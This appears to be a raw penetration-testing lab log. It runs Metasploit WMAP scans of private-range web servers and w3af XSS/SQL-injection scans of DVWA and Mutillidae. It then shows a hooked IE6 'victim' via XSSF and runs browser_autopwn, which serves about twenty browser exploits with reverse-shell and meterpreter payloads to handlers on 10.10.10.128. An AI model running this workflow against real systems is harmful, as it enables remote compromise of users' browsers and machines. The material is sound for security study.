.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012

[*] Successfully loaded plugin: wmap
msf5 > wmap_sites
[*] Usage: wmap_sites [options]
        -h        Display this help text
        -a [url]  Add site (vhost,url)
        -d [ids]  Delete sites (separate ids with space)
        -l        List all available sites
        -s [id]   Display site structure (vhost,url|ids) (level) (unicode output true/false)
msf5 > wmap_sites -a 10.10.10.129
[*] Site created.
msf5 > wmap_sites -a 10.10.10.130
[*] Site created.
msf5 > wmap_sites -a 10.10.10.254
[*] Site created.
msf5 > wmap_sites -l
[*] Available sites
===============

     Id  Host          Vhost         Port  Proto  # Pages  # Forms
     --  ----          -----         ----  -----  -------  -------
     0   10.10.10.129  10.10.10.129  80    http   0        0
     1   10.10.10.130  10.10.10.130  80    http   0        0
     2   10.10.10.254  10.10.10.254  80    http   0        0

msf5 > wmap_targets -d 0
[*] Loading 10.10.10.129,http://10.10.10.129:80/.
msf5 > wmap_run
[*] Usage: wmap_run [options]
        -h                      Display this help text
        -t                      Show all enabled modules
        -m [regex]              Launch only modules that name match provided regex.
        -p [regex]              Only test path defined by regex.
        -e [/path/to/profile]   Launch profile modules against all matched targets.
                                (No profile file runs all enabled modules.)

# Check which modules will be used in the scan
msf5 > wmap_run -t
[*] Testing target:
[*]      Site: 10.10.10.129 (10.10.10.129)
[*]      Port: 80 SSL: false
============================================================
[*] Testing started. 2019-02-07 14:30:31 +0800
[*] Loading wmap modules...
[*] 39 wmap enabled modules loaded.
[*] =[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] =[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[*] Module auxiliary/scanner/http/frontpage_login
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/scanner/http/options
[*] Module auxiliary/scanner/http/robots_txt
[*] Module auxiliary/scanner/http/scraper
[*] Module auxiliary/scanner/http/svn_scanner
[*] Module auxiliary/scanner/http/trace
[*] Module auxiliary/scanner/http/vhost_scanner
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] Module auxiliary/scanner/http/webdav_website_content
[*] =[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Module auxiliary/scanner/http/dir_scanner
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Module auxiliary/scanner/http/files_dir
[*] Module auxiliary/scanner/http/http_put
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Module auxiliary/scanner/http/trace_axd
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*] =[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*] =[ Query testing ]=
============================================================
[*] =[ General testing ]=
============================================================
[*] Done.

# View the scan results and carry out the attack
msf5 > wmap_run -e
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*]      Site: 10.10.10.129 (10.10.10.129)
[*]      Port: 80 SSL: false
============================================================
[*] Testing started. 2019-02-07 14:47:50 +0800
[*] =[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] =[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[+] 10.10.10.129:80 Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
[*] Module auxiliary/admin/http/tomcat_utf8_traversal
[*] Attempting to connect to 10.10.10.129:80
[+] No File(s) found
[*] Module auxiliary/scanner/http/drupal_views_user_enum
[-] 10.10.10.129 does not appear to be vulnerable, will not continue
[*] Module auxiliary/scanner/http/frontpage_login
[*] 10.10.10.129:80 - http://10.10.10.129/ may not support FrontPage Server Extensions
[*] Module auxiliary/scanner/http/host_header_injection
[*] Module auxiliary/scanner/http/options
[+] 10.10.10.129 allows GET,HEAD,POST,OPTIONS,TRACE methods
[+] 10.10.10.129:80 - TRACE method allowed.
[*] Module auxiliary/scanner/http/robots_txt
[*] [10.10.10.129] /robots.txt found
[+] Contents of Robots.txt:
User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/
Disallow: /xmlrpc/

[*] Module auxiliary/scanner/http/scraper
[+] [10.10.10.129] / [Free CSS template by ChocoTemplates.com]
[*] Module auxiliary/scanner/http/svn_scanner
[*] Using code '404' as not found.
[+] [10.10.10.129:80] SVN Entries file found.
[-] [10.10.10.129] Version 0 not supported
[*] Module auxiliary/scanner/http/trace
[+] 10.10.10.129:80 is vulnerable to Cross-Site Tracing
[-] Auxiliary failed: NoMethodError undefined method `id' for nil:NilClass
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/auxiliary/report.rb:295:in `report_vuln'
[-]   /usr/share/metasploit-framework/modules/auxiliary/scanner/http/trace.rb:47:in `run_host'
[-]   /usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:111:in `block (2 levels) in run'
[-]   /usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:106:in `block in spawn'
[*] Module auxiliary/scanner/http/vhost_scanner
[*] >> Exception during launch from auxiliary/scanner/http/vhost_scanner: The following options failed to validate: DOMAIN.
[*] Module auxiliary/scanner/http/webdav_internal_ip
[*] Module auxiliary/scanner/http/webdav_scanner
[*] 10.10.10.129 (Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled.
[*] Module auxiliary/scanner/http/webdav_website_content
[*] =[ File/Dir testing ]=
============================================================
[*] Module auxiliary/scanner/http/backup_file
[*] Module auxiliary/scanner/http/brute_dirs
[*] Path: /
[*] Using code '404' as not found.
[+] Found http://10.10.10.129:80/js/ 200
[+] Found http://10.10.10.129:80/op/ 200
[+] Found http://10.10.10.129:80/css/ 200
[+] Found http://10.10.10.129:80/doc/ 403
[+] Found http://10.10.10.129:80/ops/ 200
[+] Found http://10.10.10.129:80/tmp/ 200
[*] Module auxiliary/scanner/http/copy_of_file
[*] Module auxiliary/scanner/http/dir_listing
[*] Path: /
[*] Module auxiliary/scanner/http/dir_scanner
[*] Path: /
[*] Detecting error code
[*] Using code '404' as not found for 10.10.10.129
[+] Found http://10.10.10.129:80/1111/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/11/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/3/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/1/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/123321/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/1337/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/123/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/00001/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/001/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/0/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/0001/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/111/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/04/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/10/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/2/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/007/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/1000/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/123123/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/4/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/8/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/777/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/6/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/606/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/9/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/7/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/911911/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/666/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/5/ 503 (10.10.10.129)
[+] Found http://10.10.10.129:80/CHANGELOG/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/LICENSE/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/administrator/ 302 (10.10.10.129)
[+] Found http://10.10.10.129:80/cache/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/cgi-bin/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/components/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/css/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/doc/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/f/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/gallery2/ 302 (10.10.10.129)
[+] Found http://10.10.10.129:80/ghost/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/icons/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/images/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/includes/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/installation/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/javascript/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/js/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/language/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/libraries/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/login/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/logs/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/media/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/modules/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/phpBB2/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/plugins/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/phpmyadmin/ 200 (10.10.10.129)
[+] Found http://10.10.10.129:80/templates/ 404 (10.10.10.129)
[+] Found http://10.10.10.129:80/tmp/ 404 (10.10.10.129)
[*] Module auxiliary/scanner/http/dir_webdav_unicode_bypass
[*] Path: /
[*] Using code '404' as not found.
[*] Module auxiliary/scanner/http/file_same_name_dir
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/files_dir
[*] Path: /
[*] Using code '404' as not found for files with extension .null
[*] Using code '404' as not found for files with extension .backup
[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .c
[*] Using code '404' as not found for files with extension .cfg
[*] Using code '404' as not found for files with extension .class
[*] Using code '404' as not found for files with extension .copy
[*] Using code '404' as not found for files with extension .conf
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[+] Found http://10.10.10.129:80/index.html 200
[+] Found http://10.10.10.129:80/index2.html 200
[+] Found http://10.10.10.129:80/signin.html 200
[*] Using code '404' as not found for files with extension .htm
[*] Using code '404' as not found for files with extension .ini
[*] Using code '404' as not found for files with extension .log
[*] Using code '404' as not found for files with extension .old
[*] Using code '404' as not found for files with extension .orig
[*] Using code '404' as not found for files with extension .php
[+] Found http://10.10.10.129:80/index.php 302
[+] Found http://10.10.10.129:80/index2.php 302
[+] Found http://10.10.10.129:80/login.php 500
[+] Found http://10.10.10.129:80/signin.php 500
[*] Using code '404' as not found for files with extension .tar
[*] Using code '404' as not found for files with extension .tar.gz
[*] Using code '404' as not found for files with extension .tgz
[*] Using code '404' as not found for files with extension .tmp
[*] Using code '404' as not found for files with extension .temp
[*] Using code '404' as not found for files with extension .txt
[*] Using code '404' as not found for files with extension .zip
[*] Using code '404' as not found for files with extension ~
[*] Using code '404' as not found for files with extension
[+] Found http://10.10.10.129:80/administrator 301
[+] Found http://10.10.10.129:80/cache 301
[+] Found http://10.10.10.129:80/cgi-bin 301
[+] Found http://10.10.10.129:80/contact 200
[+] Found http://10.10.10.129:80/css 301
[+] Found http://10.10.10.129:80/images 301
[+] Found http://10.10.10.129:80/includes 301
[+] Found http://10.10.10.129:80/installation 301
[+] Found http://10.10.10.129:80/index 200
[+] Found http://10.10.10.129:80/index2 302
[+] Found http://10.10.10.129:80/javascript 301
[+] Found http://10.10.10.129:80/js 301
[+] Found http://10.10.10.129:80/login 500
[+] Found http://10.10.10.129:80/libraries 301
[+] Found http://10.10.10.129:80/logs 301
[+] Found http://10.10.10.129:80/modules 301
[+] Found http://10.10.10.129:80/phpmyadmin 301
[+] Found http://10.10.10.129:80/signin 200
[+] Found http://10.10.10.129:80/templates 301
[+] Found http://10.10.10.129:80/tmp 301
[+] Found http://10.10.10.129:80/xmlrpc 301
[*] Using code '404' as not found for files with extension
[+] Found http://10.10.10.129:80/administrator 301
[+] Found http://10.10.10.129:80/cache 301
[+] Found http://10.10.10.129:80/cgi-bin 301
[+] Found http://10.10.10.129:80/contact 200
[+] Found http://10.10.10.129:80/css 301
[+] Found http://10.10.10.129:80/images 301
[+] Found http://10.10.10.129:80/includes 301
[+] Found http://10.10.10.129:80/index 200
[+] Found http://10.10.10.129:80/installation 301
[+] Found http://10.10.10.129:80/index2 302
[+] Found http://10.10.10.129:80/javascript 301
[+] Found http://10.10.10.129:80/js 301
[+] Found http://10.10.10.129:80/libraries 301
[+] Found http://10.10.10.129:80/login 500
[+] Found http://10.10.10.129:80/logs 301
[+] Found http://10.10.10.129:80/modules 301
[+] Found http://10.10.10.129:80/phpmyadmin 301
[+] Found http://10.10.10.129:80/signin 200
[+] Found http://10.10.10.129:80/templates 301
[+] Found http://10.10.10.129:80/tmp 301
[+] Found http://10.10.10.129:80/xmlrpc 301
[*] Module auxiliary/scanner/http/http_put
[*] Path: /
[-] 10.10.10.129: File doesn't seem to exist. The upload probably failed
[*] Module auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
[*] Path: /
[-] 10.10.10.129:80 Folder does not require authentication. [405]
[*] Module auxiliary/scanner/http/prev_dir_same_name_file
[*] Path: /
[-] Blank or default PATH set.
[*] Module auxiliary/scanner/http/replace_ext
[*] Module auxiliary/scanner/http/soap_xml
[*] Path: /
[*] Starting scan with 0ms delay between requests
[*] Server 10.10.10.129:80 returned HTTP 404 for /. Use a different one.
[*] Module auxiliary/scanner/http/trace_axd
[*] Path: /
[*] Module auxiliary/scanner/http/verb_auth_bypass
[*] =[ Unique Query testing ]=
============================================================
[*] Module auxiliary/scanner/http/blind_sql_query
[*] Module auxiliary/scanner/http/error_sql_injection
[*] Module auxiliary/scanner/http/http_traversal
[*] Module auxiliary/scanner/http/rails_mass_assignment
[*] Module exploit/multi/http/lcms_php_exec
[*] =[ Query testing ]=
============================================================
[*] =[ General testing ]=
============================================================
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Launch completed in 778.7549073696136 seconds.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[*] Done.

# View the results
msf5 > vulns

Vulnerabilities
===============

Timestamp                Host          Name                       References
---------                ----          ----                       ----------
2019-02-07 06:49:59 UTC  10.10.10.129  HTTP Trace Method Allowed  CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561
w3af>>> plugins
w3af/plugins>>> audit xss, sqli
w3af/plugins>>> crawl web_spider
w3af/plugins>>> crawl config web_spider
w3af/plugins/crawl/config:web_spider>>> set
help   keys   back   exit
print  save   view
w3af/plugins/crawl/config:web_spider>>> set
only_forward  follow_regex  ignore_regex
w3af/plugins/crawl/config:web_spider>>> set only_forward true
w3af/plugins/crawl/config:web_spider>>> back
The configuration has been saved.
w3af/plugins>>> output html_file
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://www.dvssc.com/dvwa/index.php
w3af/config:target>>> back
The configuration has been saved.
w3af>>> start
# Crawl module
w3af/plugins>>> crawl web_spider
w3af/plugins>>> crawl config web_spider
w3af/plugins/crawl/config:web_spider>>> set only_forward true
w3af/plugins/crawl/config:web_spider>>> back
The configuration has been saved.
# Output module
w3af/plugins>>> output html_file
w3af/plugins>>> output config html_file
w3af/plugins/output/config:html_file>>> set
template  output_file  verbose
w3af/plugins/output/config:html_file>>> set verbose true
w3af/plugins/output/config:html_file>>> set output_file /root/dvssc_blog.html
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back
# Set the target
w3af>>> target
w3af/config:target>>> set
help   keys   back   exit
print  save   view
w3af/config:target>>> set target
target_os  target_framework  target
w3af/config:target>>> set target http://www.dvssc.com/mutillidae/index.php
w3af/config:target>>> back
The configuration has been saved.
# Start the scan
w3af>>> start
New URL found by web_spider plugin: "http://www.dvssc.com/mutillidae/index.php"
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=register.php", using HTTP method POST. The sent post-data was: "...user_name=..." which modifies the "user_name" parameter. This vulnerability was found in the request with id 243.
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=view-someones-blog.php", using HTTP method POST. The sent post-data was: "show_only_user=&Submit_button=Submit" which modifies the "show_only_user" parameter. This vulnerability was found in the request with id 255.
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=register.php", using HTTP method POST. The sent post-data was: "...password=..." which modifies the "password" parameter. This vulnerability was found in the request with id 271.
Found 1 URLs and 28 different injections points.
The URL list is:
- http://www.dvssc.com/mutillidae/index.php
The list of fuzzable requests is:
- Method: GET | http://www.dvssc.com/mutillidae/index.php
- Method: GET | http://www.dvssc.com/mutillidae/index.php
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (do)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (do)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: GET | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (page, php_file_name, submit)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | Query string: (page)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (show_only_user, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (target_host, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (text_file_name, B1)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (user_name, password, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (user_name, password, password_confirm, Submit_button)
- Method: POST | http://www.dvssc.com/mutillidae/index.php | URL encoded form: (view_user_name, password, Submit_button)
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php", using HTTP method GET. The sent data was: "php_file_name=&page=source-viewer.php&submit=Submit" The modified parameter was "php_file_name". This vulnerability was found in the request with id 384.
A Cross Site Scripting vulnerability was found at: "http://www.dvssc.com/mutillidae/index.php?page=user-info.php", using HTTP method POST. The sent post-data was: "view_user_name=&password=FrAmE30.&Submit_button=Submit" which modifies the "view_user_name" parameter. This vulnerability was found in the request with id 386.
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:552)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:553)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:554)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:555)
The xss plugin got an error while requesting "http://www.dvssc.com/mutillidae/index.php?page=dns-lookup.php". Exception: "HTTP timeout error". Generated 204 "No Content" response (id:557)
Scan finished in 1 minute 31 seconds
Stopping the core...
# Load the XSSF module
msf5 > load xssf
[-] Your Ruby version is 2.5.3. Make sure your version is up-to-date with the last non-vulnerable version before using XSSF!
INFORMATION ABOUT VICTIM 1
============================
IP ADDRESS      : 10.10.10.254
ACTIVE ?        : TRUE
FIRST REQUEST   : 2019-02-09 22:07:23
LAST REQUEST    : 2019-02-09 22:23:53
CONNECTION TIME : 0hr 16min 30sec
BROWSER NAME    : Internet Explorer
BROWSER VERSION : 6.0
OS NAME         : Windows
OS VERSION      : XP
ARCHITECTURE    : ARCH_X86
LOCATION        : http://10.10.10.128:8888
XSSF COOKIE ?   : YES
RUNNING ATTACK  : NONE
WAITING ATTACKS : 0
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
Auxiliary action:
   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits
msf5 auxiliary(server/browser_autopwn) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf5 auxiliary(server/browser_autopwn) > set SRVHOST 10.10.10.128
SRVHOST => 10.10.10.128
msf5 auxiliary(server/browser_autopwn) > exploit
[*] Auxiliary module running as background job 0.
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/UpcSM
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/NJNtplVtwKv
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/dFOtVUOMPmc
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/oQIYImSFPVkT
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/STMNDtGOTiANY
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/uBrKmGeGJoM
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/PHlayF
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/btZYRTHW
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/MtrrbGqvxBGp
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/gqnIrlsGGGL
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/qjoHtDYsUA
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/VTRsYvyICuI
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/nscgcOF
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/gcErPNn
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/nozikgfm
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/doNKZzOvFhj
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/hyVgsOceIkWv
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/qDXS
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/Zxijin
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 10.10.10.128:3333
[*] Using URL: http://10.10.10.128:8080/aaeoheX
[*] Server started.
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 10.10.10.128:6666
[*] Started reverse TCP handler on 10.10.10.128:7777
[*] --- Done, found 20 exploit modules    # 20 modules available for the attack in total
[*] Using URL: http://10.10.10.128:8080/P8ZELlXN4
[*] Server started.
# View them
msf5 auxiliary(server/browser_autopwn) > jobs